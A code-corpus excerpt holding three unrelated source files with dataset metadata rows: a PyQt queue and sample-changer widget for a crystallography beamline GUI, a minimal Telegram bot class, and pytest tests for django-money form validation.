self.queue_autosave_action.setEnabled(self["enableQueueAutoSave"])
self.tools_menu.addSeparator()
self.queue_undo_action = self.tools_menu.addAction(
"Undo last action", self.queue_undo_clicked
)
self.queue_undo_action.setEnabled(False)
self.queue_redo_action = self.tools_menu.addAction(
"Redo last action", self.queue_redo_clicked
)
self.queue_redo_action.setEnabled(False)
self.tools_menu.addSeparator()
self.queue_sync_action = self.tools_menu.addAction(
"Sync with ISPyB", self.queue_sync_clicked
)
self.queue_sync_action.setEnabled(False)
if BaseWidget._menubar is not None:
BaseWidget._menubar.insert_menu(self.tools_menu, 1)
self.hide_dc_parameters_tab.emit(True)
self.hide_dcg_tab.emit(True)
self.hide_sample_centring_tab.emit(False)
self.hide_char_parameters_tab.emit(True)
self.hide_sample_changer_tab.emit(True)
self.hide_plate_manipulator_tab.emit(True)
self.hide_sample_tab.emit(True)
self.hide_energy_scan_tab.emit(True)
self.hide_xrf_spectrum_tab.emit(True)
self.hide_workflow_tab.emit(True)
self.hide_advanced_tab.emit(True)
def property_changed(self, property_name, old_value, new_value):
if property_name == "useFilterWidget":
self.sample_changer_widget.filter_label.setVisible(new_value)
self.sample_changer_widget.filter_ledit.setVisible(new_value)
self.sample_changer_widget.filter_combo.setVisible(new_value)
elif property_name == "useSampleWidget":
self.sample_changer_widget.sample_label.setVisible(new_value)
self.sample_changer_widget.sample_combo.setVisible(new_value)
elif property_name == "useCentringMethods":
self.sample_changer_widget.centring_cbox.setEnabled(new_value)
self.sample_changer_widget.centring_mode_label.setEnabled(new_value)
elif property_name == "xml_rpc_server":
xml_rpc_server_hwobj = self.get_hardware_object(new_value)
if xml_rpc_server_hwobj:
self.connect(xml_rpc_server_hwobj, "add_to_queue", self.add_to_queue)
self.connect(
xml_rpc_server_hwobj,
"start_queue",
self.dc_tree_widget.collect_items,
)
self.connect(
xml_rpc_server_hwobj, "open_dialog", self.open_xmlrpc_dialog
)
elif property_name == "hwobj_state_machine":
self.state_machine_hwobj = self.get_hardware_object(
new_value, optional=True
)
elif property_name == "redis_client":
self.redis_client_hwobj = self.get_hardware_object(new_value, optional=True)
elif property_name == "scOneName":
self.sample_changer_widget.filter_cbox.setItemText(1, new_value)
elif property_name == "scTwoName":
self.sample_changer_widget.filter_cbox.setItemText(2, new_value)
elif property_name == "usePlateNavigator":
self.dc_tree_widget.plate_navigator_cbox.setVisible(new_value)
elif property_name == "useHistoryView":
# self.dc_tree_widget.history_tree_widget.setVisible(new_value)
self.dc_tree_widget.history_enable_cbox.setVisible(new_value)
else:
BaseWidget.property_changed(self, property_name, old_value, new_value)
@QtImport.pyqtSlot(int, str, str, int, str, str, bool)
def set_session(
self,
session_id,
t_prop_code=None,
prop_number=None,
prop_id=None,
start_date=None,
prop_code=None,
is_inhouse=None,
):
HWR.beamline.session.set_session_start_date(str(start_date))
@QtImport.pyqtSlot()
def set_requested_tree_brick(self):
self.get_tree_brick.emit(self)
@QtImport.pyqtSlot(bool)
def logged_in(self, logged_in):
"""
        Connected to the loggedIn signal of ProposalBrick2.
        The signal is emitted when a user has successfully logged in.
        First, free-pin mode is created.
        Then it tries to initialize two sample changers and create
        two associated queue models.
"""
self.is_logged_in = logged_in
# self.enable_collect(logged_in)
# if not logged_in:
if True:
self.dc_tree_widget.sample_mount_method = 0
self.dc_tree_widget.populate_free_pin()
self.dc_tree_widget.plate_navigator_cbox.setVisible(False)
if (
HWR.beamline.sample_changer is not None
and HWR.beamline.diffractometer.use_sample_changer()
):
sc_basket_content, sc_sample_content = self.get_sc_content()
if sc_basket_content and sc_sample_content:
sc_basket_list, sc_sample_list = self.dc_tree_widget.samples_from_sc_content(
sc_basket_content, sc_sample_content
)
self.dc_tree_widget.sample_mount_method = 1
self.dc_tree_widget.populate_tree_widget(
sc_basket_list,
sc_sample_list,
self.dc_tree_widget.sample_mount_method,
)
self.sample_changer_widget.details_button.setText("Show SC-details")
if (
HWR.beamline.plate_manipulator is not None
and HWR.beamline.diffractometer.in_plate_mode()
):
if self["usePlateNavigator"]:
self.dc_tree_widget.plate_navigator_cbox.setVisible(True)
plate_row_content, plate_sample_content = self.get_plate_content()
if plate_sample_content:
plate_row_list, plate_sample_list = self.dc_tree_widget.samples_from_sc_content(
plate_row_content, plate_sample_content
)
self.dc_tree_widget.sample_mount_method = 2
self.dc_tree_widget.populate_tree_widget(
plate_row_list,
plate_sample_list,
self.dc_tree_widget.sample_mount_method,
)
self.sample_changer_widget.details_button.setText(
"Show Plate-details"
)
self.sample_changer_widget.filter_cbox.setCurrentIndex(
self.dc_tree_widget.sample_mount_method
)
self.dc_tree_widget.filter_sample_list(
self.dc_tree_widget.sample_mount_method
)
if self.dc_tree_widget.sample_mount_method > 0:
# Enable buttons related to sample changer
self.sample_changer_widget.filter_cbox.setEnabled(True)
self.sample_changer_widget.details_button.setEnabled(True)
self.dc_tree_widget.scroll_to_item()
if self.dc_tree_widget.sample_mount_method < 2 and logged_in:
self.sample_changer_widget.synch_ispyb_button.setEnabled(True)
if self.redis_client_hwobj is not None:
self.redis_client_hwobj.load_graphics()
self.load_queue()
self.dc_tree_widget.samples_initialized = True
# if not self.dc_tree_widget.samples_initialized
# self.dc_tree_widget.sample_tree_widget_selection()
# self.dc_tree_widget.set_sample_pin_icon()
# self.dc_tree_widget.scroll_to_item()
self.dc_tree_widget.update_basket_selection()
def enable_collect(self, state):
"""
Enables the collect controls.
:param state: Enable if state is True and disable if False
:type state: bool
:returns: None
"""
self.dc_tree_widget.enable_collect(state)
def queue_entry_execution_started(self, queue_entry):
self.current_queue_entry = queue_entry
self.enable_widgets.emit(False)
self.dc_tree_widget.queue_entry_execution_started(queue_entry)
# BaseWidget.set_status_info("status", "Queue started", "running")
def queue_entry_execution_finished(self, queue_entry, status):
self.current_queue_entry = None
self.dc_tree_widget.queue_entry_execution_finished(queue_entry, status)
self.enable_widgets.emit(True)
if queue_entry.get_type_str() not in ["Sample", "Basket", ""]:
BaseWidget.set_status_info(
"collect", "%s : %s" % (queue_entry.get_type_str(), status)
)
def queue_paused_handler(self, status):
self.enable_widgets.emit(True)
self.dc_tree_widget.queue_paused_handler(status)
def queue_execution_finished(self, status):
# self.enable_widgets.emit(True)
self.current_queue_entry = None
self.dc_tree_widget.queue_execution_completed(status)
def queue_stop_handler(self, status):
self.enable_widgets.emit(True)
self.dc_tree_widget.queue_stop_handler(status)
        # BaseWidget.set_status_info("status", "Queue stopped")
def diffractometer_ready_changed(self, status):
self.diffractometer_ready.emit(HWR.beamline.diffractometer.is_ready())
try:
info_message = HWR.beamline.diffractometer.get_status()
except AttributeError:
info_message = None
if info_message is None and status:
info_message = "Ready"
info_status = "ready"
elif info_message is None:
info_message = "Not ready"
info_status = "running"
else:
info_status = "ready"
BaseWidget.set_status_info("diffractometer", info_message, info_status)
def diffractometer_automatic_centring_done(self, point):
if self.dc_tree_widget.centring_method == CENTRING_METHOD.LOOP:
message_box = QtImport.QMessageBox()
message_box.setIcon(QtImport.QMessageBox.Question)
message_box.setWindowTitle("Optical centring with user confirmation.")
message_box.setText("Optical centring done. How to proceed?")
message_box.addButton("Accept result", QtImport.QMessageBox.ApplyRole)
message_box.addButton("Try again", QtImport.QMessageBox.RejectRole)
if self.current_queue_entry:
message_box.addButton(
"Skip following entry", QtImport.QMessageBox.NoRole
)
result = message_box.exec_()
if result == QtImport.QMessageBox.AcceptRole:
HWR.beamline.diffractometer.automatic_centring_try_count = 0
elif result == QtImport.QMessageBox.RejectRole:
logging.getLogger("GUI").info(
"Optical centring result rejected. " + "Trying once again."
)
else:
HWR.beamline.diffractometer.automatic_centring_try_count = 0
if self.current_queue_entry:
logging.getLogger("GUI").info(
"Optical centring rejected "
+ "and the following queue entries skipped"
)
task_group_entry = self.current_queue_entry.get_container()
for child_entry in task_group_entry.get_queue_entry_list():
child_entry.set_enabled(False)
def samples_from_lims(self, samples):
barcode_samples, location_samples = self.dc_tree_widget.samples_from_lims(
samples
)
l_samples = dict()
# TODO: add test for sample changer type, here code is for Robodiff only
for location, l_sample in location_samples.items():
if l_sample.lims_location != (None, None):
basket, sample = l_sample.lims_location
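                # Map the flat basket index onto a (cell, puck) pair, assuming three
                # pucks per cell (Robodiff dewar layout, per the TODO note above).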
cell = int(round((basket + 0.5) / 3.0))
puck = basket - 3 * (cell - 1)
new_location = (cell, puck, sample)
l_sample.lims_location = new_location
l_samples[new_location] = l_sample
name = l_sample.get_name()
l_sample.init_from_sc_sample([new_location])
l_sample.set_name(name)
return barcode_samples, l_samples
def refresh_sample_list(self):
"""
        Retrieves sample information from ISPyB and populates the sample list
        accordingly.
"""
log = logging.getLogger("user_level_log")
self.lims_samples = HWR.beamline.lims.get_samples(
HWR.beamline.session.proposal_id, HWR.beamline.session.session_id
)
basket_list = []
sample_list = []
self.filtered_lims_samples = []
sample_changer = None
self.sample_changer_widget.sample_combo.clear()
for sample in self.lims_samples:
try:
if sample.containerSampleChangerLocation:
self.filtered_lims_samples.append(sample)
item_text = "%s-%s" % (sample.proteinAcronym, sample.sampleName)
self.sample_changer_widget.sample_combo.addItem(item_text)
except BaseException:
pass
self.sample_changer_widget.sample_label.setEnabled(True)
self.sample_changer_widget.sample_combo.setEnabled(True)
self.sample_changer_widget.sample_combo.setCurrentIndex(-1)
if self.dc_tree_widget.sample_mount_method == 1:
sample_changer = HWR.beamline.sample_changer
elif self.dc_tree_widget.sample_mount_method == 2:
sample_changer = HWR.beamline.plate_manipulator
# if len(self.lims_samples) == 0:
# log.warning("No sample available in LIMS")
# self.mount_mode_combo_changed(self.sample_changer_widget.filter_cbox.currentIndex())
# return
if sample_changer is not None:
(barcode_samples, location_samples) = self.dc_tree_widget.samples_from_lims(
self.lims_samples
)
sc_basket_content, sc_sample_content = self.get_sc_content()
sc_basket_list, sc_sample_list = self.dc_tree_widget.samples_from_sc_content(
sc_basket_content, sc_sample_content
)
basket_list = sc_basket_list
# self.queue_sync_action.setEnabled(True)
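            # Match every sample reported by the sample changer against LIMS data:
            # prefer a barcode match, fall back to the (basket, position) location,
            # and keep the bare SC sample when LIMS knows nothing about it.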
for sc_sample in sc_sample_list:
# Get the sample in lims with the barcode
# sc_sample.code
lims_sample = barcode_samples.get(sc_sample.code)
# There was a sample with that barcode
if lims_sample:
if lims_sample.lims_location == sc_sample.location:
log.debug(
"Found sample in ISPyB for location %s"
% str(sc_sample.location)
)
sample_list.append(lims_sample)
else:
log.warning(
"The sample with the barcode (%s) exists" % sc_sample.code
+ " in LIMS but the location does not mat"
+ "ch. Sample changer location: %s, LIMS "
% sc_sample.location
+ "location %s" % lims_sample.lims_location
)
sample_list.append(sc_sample)
else: # No sample with that barcode, continue with location
lims_sample = location_samples.get(sc_sample.location)
if lims_sample:
if lims_sample.lims_code:
log.warning(
"The sample has a barcode in LIMS, but "
+ "the SC has no barcode information for "
+ "this sample. For location: %s"
% str(sc_sample.location)
)
sample_list.append(lims_sample)
else:
log.debug(
"Found sample in ISPyB for location %s"
% str(sc_sample.location)
)
sample_list.append(lims_sample)
else:
if lims_sample:
if lims_sample.lims_location is not None:
log.warning(
"No barcode was provided in ISPyB "
+ "which makes it impossible to verify if"
+ "the locations are correct, assuming "
+ "that the positions are correct."
)
sample_list.append(lims_sample)
else:
# log.warning("No sample in ISPyB for location %s" % \
# str(sc_sample.location))
sample_list.append(sc_sample)
self.dc_tree_widget.populate_tree_widget(
basket_list, sample_list, self.dc_tree_widget.sample_mount_method
)
self.dc_tree_widget.de_select_items()
def sample_combo_changed(self, index):
"""
Assigns lims sample to manually-mounted sample
"""
self.dc_tree_widget.filter_sample_list(0)
root_model = HWR.beamline.queue_model.get_model_root()
sample_model = root_model.get_children()[0]
sample_model.init_from_lims_object(self.filtered_lims_samples[index])
self.dc_tree_widget.sample_tree_widget.clear()
self.dc_tree_widget.populate_free_pin(sample_model)
def get_sc_content(self):
"""
Gets the 'raw' data from the sample changer.
:returns: A list with tuples, containing the sample information.
"""
sc_basket_content = []
sc_sample_content = []
for basket in HWR.beamline.sample_changer.get_basket_list():
basket_index = basket.get_index()
basket_name = basket.get_name()
sc_basket_content.append((basket_index + 1, basket, basket_name))
for sample in HWR.beamline.sample_changer.get_sample_list():
matrix = sample.get_id() or ""
basket_index = sample.get_container().get_index()
sample_index = sample.get_index()
sample_name = sample.get_name()
sc_sample_content.append(
(matrix, basket_index + 1, sample_index + 1, sample_name)
)
return sc_basket_content, sc_sample_content
def get_plate_content(self):
"""
"""
plate_row_content = []
plate_sample_content = []
for row in HWR.beamline.plate_manipulator.get_basket_list():
row_index = row.get_index()
row_name = row.get_name()
plate_row_content.append((row_index, row, row_name))
for sample in HWR.beamline.plate_manipulator.get_sample_list():
row_index = sample.get_cell().get_row_index()
sample_name = sample.get_name()
coords = sample.get_coords()
matrix = sample.get_id() or ""
plate_sample_content.append((matrix, coords[0], coords[1], sample_name))
return plate_row_content, plate_sample_content
def status_msg_changed(self, msg, color):
"""
Status message from the SampleChangerBrick.
:param msg: The message
:type msg: str
:returns: None
"""
logging.getLogger("GUI").info(msg)
def set_sample_pin_icon(self):
"""
Updates the location of the sample pin when the
matrix code information changes. The matrix code information
is updated, but not exclusively, when a sample is changed.
"""
self.dc_tree_widget.set_sample_pin_icon()
def sample_load_state_changed(self, state, *args):
"""
The state in the sample loading procedure changed.
        i.e. from Loading to Mounted.
:param state: str (Enumerable)
:returns: None
"""
s_color = SC_STATE_COLOR.get(state, "UNKNOWN")
Colors.set_widget_color(
self.sample_changer_widget.details_button, QtImport.QColor(s_color)
)
self.dc_tree_widget.scroll_to_item()
if HWR.beamline.diffractometer.in_plate_mode():
self.dc_tree_widget.plate_navigator_widget.refresh_plate_location()
def sample_selection_changed(self):
"""
Updates the selection of pucks. Method is called when the selection
of pucks in the dewar has been changed.
"""
self.dc_tree_widget.update_basket_selection()
def sample_changer_status_changed(self, state):
BaseWidget.set_status_info("sc", state)
def plate_info_changed(self):
self.set_sample_pin_icon()
self.dc_tree_widget.plate_navigator_widget.refresh_plate_location()
self.dc_tree_widget.scroll_to_item()
def show_sample_centring_tab(self):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_sample_centring_tab.emit(False)
def show_sample_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_sample_tab.emit(False)
def show_dcg_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_dcg_tab.emit(False)
self.populate_dc_group_tab(item)
def populate_dc_group_tab(self, item=None):
self.populate_dc_group_widget.emit(item)
def show_datacollection_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_dc_parameters_tab.emit(False)
self.populate_dc_parameters_tab(item)
def populate_dc_parameters_tab(self, item=None):
self.populate_dc_parameter_widget.emit(item)
def show_char_parameters_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_char_parameters_tab.emit(False)
def populate_char_parameters_tab(self, item):
self.populate_char_parameter_widget.emit(item)
def show_energy_scan_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_energy_scan_tab.emit(False)
self.populate_energy_scan_tab(item)
def populate_energy_scan_tab(self, item):
self.populate_energy_scan_widget.emit(item)
def show_xrf_spectrum_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_xrf_spectrum_tab.emit(False)
self.populate_xrf_spectrum_tab(item)
def populate_xrf_spectrum_tab(self, item):
self.populate_xrf_spectrum_widget.emit(item)
def show_advanced_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_advanced_tab.emit(False)
self.populate_advanced_tab(item)
def populate_advanced_tab(self, item):
self.populate_advanced_widget.emit(item)
def show_workflow_tab_from_model(self):
self.show_workflow_tab(None)
def show_workflow_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
running = HWR.beamline.queue_manager.is_executing()
self.populate_workflow_tab(item, running=running)
def populate_workflow_tab(self, item, running=False):
self.populate_workflow_widget.emit((item, running))
def show_xray_imaging_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_xray_imaging_tab.emit(False)
self.populate_xray_imaging_tab(item)
def populate_xray_imaging_tab(self, item):
self.populate_xray_imaging_widget.emit(item)
def mount_mode_combo_changed(self, index):
self.dc_tree_widget.filter_sample_list(index)
self.sample_changer_widget.details_button.setEnabled(index > 0)
self.sample_changer_widget.synch_ispyb_button.setEnabled(
index < 2 and self.is_logged_in
)
# self.sample_changer_widget.sample_label.setEnabled(False)
# self.sample_changer_widget.sample_combo.setEnabled(index == 0)
if index == 0:
self.hide_sample_changer_tab.emit(True)
self.hide_plate_manipulator_tab.emit(True)
def toggle_sample_changer_tab(self):
if self.current_view == self.sample_changer_widget:
self.current_view = None
if self.dc_tree_widget.sample_mount_method == 1:
self.hide_sample_changer_tab.emit(True)
self.sample_changer_widget.details_button.setText("Show SC-details")
else:
self.hide_plate_manipulator_tab.emit(True)
self.sample_changer_widget.details_button.setText("Show Plate-details")
self.dc_tree_widget.sample_tree_widget_selection()
else:
self.current_view = self.sample_changer_widget
self.hide_dc_parameters_tab.emit(True)
self.hide_dcg_tab.emit(True)
if self.dc_tree_widget.sample_mount_method == 1:
self.hide_sample_changer_tab.emit(False)
self.sample_changer_widget.details_button.setText("Hide SC-details")
else:
self.hide_plate_manipulator_tab.emit(False)
self.sample_changer_widget.details_button.setText("Hide Plate-details")
self.hide_sample_tab.emit(True)
def selection_changed_cb(self, items):
if len(items) == 1:
item = items[0]
if isinstance(item, queue_item.SampleQueueItem):
self.populate_sample_details.emit(item.get_model())
self.emit_set_sample(item)
self.emit_set_directory()
self.emit_set_prefix(item)
# self.populate_edna_parameter_widget(item)
elif isinstance(item, queue_item.DataCollectionQueueItem):
data_collection = item.get_model()
if data_collection.is_mesh():
self.populate_advanced_tab(item)
else:
self.populate_dc_parameters_tab(item)
elif isinstance(item, queue_item.CharacterisationQueueItem):
self.populate_char_parameters_tab(item)
elif isinstance(item, queue_item.EnergyScanQueueItem):
self.populate_energy_scan_tab(item)
elif isinstance(item, queue_item.XRFSpectrumQueueItem):
self.populate_xrf_spectrum_tab(item)
elif isinstance(item, queue_item.GenericWorkflowQueueItem):
self.populate_workflow_tab(item)
elif isinstance(item, queue_item.DataCollectionGroupQueueItem):
self.populate_dc_group_tab(item)
elif isinstance(item, queue_item.XrayCenteringQueueItem):
self.populate_advanced_tab(item)
elif isinstance(item, queue_item.XrayImagingQueueItem):
self.populate_xray_imaging_tab(item)
self.selection_changed.emit(items)
def emit_set_directory(self):
directory = str(HWR.beamline.session.get_base_image_directory())
self.set_directory.emit(directory)
def emit_set_prefix(self, item):
prefix = HWR.beamline.session.get_default_prefix(item.get_model())
self.set_prefix.emit(prefix)
def emit_set_sample(self, item):
self.set_sample.emit(item)
def get_selected_items(self):
items = self.dc_tree_widget.get_selected_items()
return items
def add_to_queue(self, task_list, parent_tree_item=None, set_on=True):
if not parent_tree_item:
parent_tree_item = self.dc_tree_widget.get_mounted_sample_item()
self.dc_tree_widget.add_to_queue(task_list, parent_tree_item, set_on)
def open_xmlrpc_dialog(self, dialog_dict):
QtImport.QMessageBox.information(
self,
"Message from beamline operator",
dialog_dict["msg"],
QtImport.QMessageBox.Ok,
)
def select_last_added_item(self):
self.dc_tree_widget.select_last_added_item()
def filter_combo_changed(self, filter_index):
"""Filters sample treewidget based on the selected filter criteria:
0 : No filter
1 : Star
2 : Sample name
3 : Protein name
4 : Basket index
5 : Executed
6 : Not executed
7 : OSC
8 : Helical
9 : Characterisation
10: Energy Scan
11: XRF spectrum
"""
self.sample_changer_widget.filter_ledit.setEnabled(filter_index in (2, 3, 4))
self.clear_filter()
if filter_index > 0:
item_iterator = QtImport.QTreeWidgetItemIterator(
self.dc_tree_widget.sample_tree_widget
)
item = item_iterator.value()
while item:
hide = False
item_model = item.get_model()
if filter_index == 1:
hide = not item.has_star()
elif filter_index == 5:
if isinstance(item, queue_item.DataCollectionQueueItem):
hide = not item_model.is_executed()
elif filter_index == 6:
if isinstance(item, queue_item.DataCollectionQueueItem):
hide = item_model.is_executed()
elif filter_index == 7:
if isinstance(item, queue_item.DataCollectionQueueItem):
hide = item_model.is_helical()
else:
hide = True
elif filter_index == 8:
if isinstance(item, queue_item.DataCollectionQueueItem):
hide = not item_model.is_helical()
else:
hide = True
elif filter_index == 9:
hide = not isinstance(item, queue_item.CharacterisationQueueItem)
elif filter_index == 10:
hide = not isinstance(item, queue_item.EnergyScanQueueItem)
elif filter_index == 11:
hide = not isinstance(item, queue_item.XRFSpectrumQueueItem)
# elif filter_index == 11:
# hide = not isinstance(item, queue_item.AdvancedQueueItem)
if type(item) not in (
queue_item.TaskQueueItem,
queue_item.SampleQueueItem,
queue_item.BasketQueueItem,
queue_item.DataCollectionGroupQueueItem,
):
item.set_hidden(hide)
item_iterator += 1
item = item_iterator.value()
self.dc_tree_widget.hide_empty_baskets()
def filter_text_changed(self, new_text):
item_iterator = QtImport.QTreeWidgetItemIterator(
self.dc_tree_widget.sample_tree_widget
)
item = item_iterator.value()
filter_index = self.sample_changer_widget.filter_combo.currentIndex()
while item:
hide = False
new_text = str(new_text)
if filter_index == 2:
if isinstance(item, queue_item.SampleQueueItem):
                    hide = new_text not in item.text(0)
elif filter_index == 3:
if isinstance(item, queue_item.SampleQueueItem):
                    hide = new_text not in item.get_model().crystals[0].protein_acronym
elif filter_index == 4:
if isinstance(item, queue_item.BasketQueueItem):
if new_text.isdigit():
# Display one basket
hide = int(new_text) != item.get_model().location[0]
else:
# Display several baskets. Separated with ","
                        enable_basket_list = new_text.split(",")
                        if len(enable_basket_list) > 1:
                            hide = (
                                str(item.get_model().location[0]) not in enable_basket_list
                            )
item.set_hidden(hide)
item_iterator += 1
item = item_iterator.value()
if filter_index != 3:
self.dc_tree_widget.hide_empty_baskets()
def clear_filter(self):
item_iterator = QtImport.QTreeWidgetItemIterator(
self.dc_tree_widget.sample_tree_widget
)
item = item_iterator.value()
while item:
item.set_hidden(False)
item_iterator += 1
item = item_iterator.value()
def diffractometer_phase_changed(self, phase):
if self.enable_collect_conditions.get("diffractometer") != (
phase != "BeamLocation"
):
self.enable_collect_conditions["diffractometer"] = phase != "BeamLocation"
if phase:
self.update_enable_collect()
def ppu_status_changed(self, in_error, status_msg):
if self.enable_collect_conditions.get("ppu") != (in_error != True):
self.enable_collect_conditions["ppu"] = in_error != True
self.update_enable_collect()
def shutter_state_changed(self, state, msg=None):
# NBNB TODO HACK.
# Necessary because shutter states can be both 'opened', 'OPEN'. (and more?)
# NBNB fixme
is_open = bool(state and state.lower().startswith('open'))
if self.enable_collect_conditions.get("shutter") != is_open:
self.enable_collect_conditions["shutter"] = is_open
self.update_enable_collect()
def machine_current_changed(self, value, in_range):
return
if self.enable_collect_conditions.get("machine_current") != in_range:
self.enable_collect_conditions["machine_current"] = in_range
self.update_enable_collect()
def update_enable_collect(self):
if self.current_queue_entry is not None:
#Do not enable/disable collect button if queue is executing
return
# Do not allow to start xray imaging from BeamLocation and DataCollection phase
self.enable_collect_conditions["imaging"] = True
for item in self.get_selected_items():
if isinstance(
item, queue_item.XrayImagingQueueItem
) and HWR.beamline.diffractometer.get_current_phase() in (
"BeamLocation",
"DataCollection",
):
self.enable_collect_conditions["imaging"] = False
enable_collect = all(
item == True for item in self.enable_collect_conditions.values()
)
if enable_collect != self.dc_tree_widget.enable_collect_condition:
if enable_collect:
logging.getLogger("GUI").info("Data collection is enabled")
else:
msg = ""
logging.getLogger("GUI").warning("Data collect is disabled")
for key, value in self.enable_collect_conditions.items():
if value == False:
if key == "diffractometer":
logging.getLogger("GUI").warning(
" - Diffractometer is in beam location phase"
)
elif key == "shutter":
logging.getLogger("GUI").warning(
" - Safety shutter is closed "
+ "(Open the safety shutter to enable collections)"
)
elif key == "ppu":
logging.getLogger("GUI").error(" - PPU is in error state")
elif key == "machine_current":
logging.getLogger("GUI").error(
" - Machine current is to low "
+ "(Wait till the machine current reaches 90 mA)"
)
elif key == "imaging":
logging.getLogger("GUI").warning(
"To start an imaging collection "
+ "diffractometer has to be in SampleCentering or in Transfer phase"
)
self.dc_tree_widget.enable_collect_condition = enable_collect
self.dc_tree_widget.toggle_collect_button_enabled()
def save_queue(self):
"""Saves queue in the file"""
if self.redis_client_hwobj is not None:
self.redis_client_hwobj.save_queue()
# else:
# self.dc_tree_widget.save_queue()
def auto_save_queue(self):
"""Saves queue in the file"""
if self.queue_autosave_action is not None:
if (
self.queue_autosave_action.isChecked()
and self.dc_tree_widget.samples_initialized
):
if self.redis_client_hwobj is not None:
self.redis_client_hwobj.save_queue()
# else:
# self.dc_tree_widget.save_queue()
def load_queue(self):
"""Loads queue from file"""
loaded_model = None
if self.redis_client_hwobj is not None:
loaded_model = self.redis_client_hwobj.load_queue()
if loaded_model is not None:
self.dc_tree_widget.sample_tree_widget.clear()
model_map = {"free-pin": 0, "ispyb": 1, "plate": 2}
self.sample_changer_widget.filter_cbox.setCurrentIndex(
model_map[loaded_model]
)
self.mount_mode_combo_changed(model_map[loaded_model])
self.select_last_added_item()
self.dc_tree_widget.scroll_to_item(self.dc_tree_widget.last_added_item)
return loaded_model
def queue_autosave_clicked(self):
"""Enable/disable queue autosave"""
pass
def queue_undo_clicked(self):
"""If queue autosave is enabled then undo last change"""
self.dc_tree_widget.undo_queue()
def queue_redo_clicked(self):
"""If queue autosave is enable then redo last changed"""
self.dc_tree_widget.redo_queue()
def queue_sync_clicked(self):
"""Add diffraction plan from ISPyB to all samples"""
self.dc_tree_widget.sample_tree_widget.selectAll()
self.dc_tree_widget.sync_diffraction_plan()
def data_path_changed(self, conflict):
"""Data path changed event. Used in state machine"""
self.dc_tree_widget.item_parameters_changed()
self.set_condition_state("data_path_valid", not conflict)
def acq_parameters_changed(self, conflict):
"""Acq parameter changed event. Used in state machine"""
self.dc_tree_widget.item_parameters_changed()
self.set_condition_state("acq_parameters_valid", len(conflict) == 0)
def set_condition_state(self, condition_name, value):
"""Sets condition to defined state"""
if self.state_machine_hwobj is not None:
self.state_machine_hwobj.condition_changed(condition_name, value)
|
lgpl-3.0
| -3,314,555,617,902,337,000
| 41.44164
| 100
| 0.579697
| false
| 4.01522
| false
| false
| false
|
mhspradlin/go-lite-bot
|
bot.py
|
1
|
1582
|
# Simply the class definitions for the bot and worker declarations
# Nice way to make HTTP get requests
import requests
# A nice holder for information we need between function calls
class Bot:
double_resets = {}
def __init__ (self, token):
self.token = token
        self.handlers = {}  # maps trigger text to its handler function
# Adds a single event handler
def addHandler (self, text, func):
        self.handlers[text] = func
# Sends a text message to the specified chat_id
def sendMessage (self, chat_id = None, text = None):
if (chat_id != None and text != None):
r = requests.post('https://api.telegram.org/bot' + self.token +
'/sendMessage' +
'?chat_id=' + str(chat_id) +
'&text=' + text)
while r.status_code != requests.codes.ok:
r = requests.post('https://api.telegram.org/bot' + self.token +
'/sendMessage' +
'?chat_id=' + str(chat_id) +
'&text=' + text)
# Sends as photo using multipart-formdata
# Note that photo is a file-like object (like a StringIO object)
def sendImage (self, chat_id = None, photo = None):
if (chat_id != None and photo != None):
data = { 'chat_id' : str(chat_id) }
files = { 'photo' : ('board-image.png', photo) }
requests.post('https://api.telegram.org/bot' + self.token +
'/sendPhoto', data = data, files = files)
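# Example usage (illustrative only; the token and chat id below are placeholders):
#     bot = Bot('123456:ABC-DEF')
#     bot.sendMessage(chat_id=42, text='hello from go-lite-bot')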
|
mit
| 952,455,742,594,944,600
| 38.575
| 79
| 0.513274
| false
| 4.152231
| false
| false
| false
|
AlexRiina/django-money
|
tests/test_form.py
|
1
|
2341
|
# -*- coding: utf-8 -*-
"""
Created on May 7, 2011
@author: jake
"""
from decimal import Decimal
import moneyed
import pytest
from moneyed import Money
from .testapp.forms import (
MoneyForm,
MoneyFormMultipleCurrencies,
MoneyModelForm,
OptionalMoneyForm,
)
from .testapp.models import ModelWithVanillaMoneyField
pytestmark = pytest.mark.django_db
def test_save():
money = Money(Decimal('10'), moneyed.SEK)
form = MoneyModelForm({'money_0': money.amount, 'money_1': money.currency})
assert form.is_valid()
instance = form.save()
retrieved = ModelWithVanillaMoneyField.objects.get(pk=instance.pk)
assert money == retrieved.money
def test_validate():
money = Money(Decimal('10'), moneyed.SEK)
form = MoneyForm({'money_0': money.amount, 'money_1': money.currency})
assert form.is_valid()
result = form.cleaned_data['money']
assert result == money
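# Each payload below is expected to fail MoneyForm validation; the exact amount and
# currency constraints are declared on the form in tests/testapp/forms.py (not shown here).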
@pytest.mark.parametrize(
'data',
(
{'money_0': 'xyz*|\\', 'money_1': moneyed.SEK},
{'money_0': 10000, 'money_1': moneyed.SEK},
{'money_0': 1, 'money_1': moneyed.SEK},
{'money_0': 10, 'money_1': moneyed.EUR}
)
)
def test_form_is_invalid(data):
assert not MoneyForm(data).is_valid()
@pytest.mark.parametrize(
'data, result',
(
({'money_0': '', 'money_1': moneyed.SEK}, []),
({'money_0': '1.23', 'money_1': moneyed.SEK}, ['money']),
)
)
def test_changed_data(data, result):
assert MoneyForm(data).changed_data == result
def test_change_currency_not_amount():
"""
If the amount is the same, but the currency changes, then we
should consider this to be a change.
"""
form = MoneyFormMultipleCurrencies(
{'money_0': Decimal(10), 'money_1': moneyed.EUR},
initial={'money': Money(Decimal(10), moneyed.SEK)}
)
assert form.changed_data == ['money']
@pytest.mark.parametrize(
'data, result',
(
({'money_1': moneyed.SEK}, True),
({'money_0': '', 'money_1': moneyed.SEK}, True),
({'money_0': 'xyz*|\\', 'money_1': moneyed.SEK}, False),
)
)
def test_optional_money_form(data, result):
"""
The currency widget means that 'money_1' will always be filled
in, but 'money_0' could be absent/empty.
"""
assert OptionalMoneyForm(data).is_valid() is result
|
bsd-3-clause
| -7,676,951,155,857,008,000
| 23.642105
| 79
| 0.620248
| false
| 3.121333
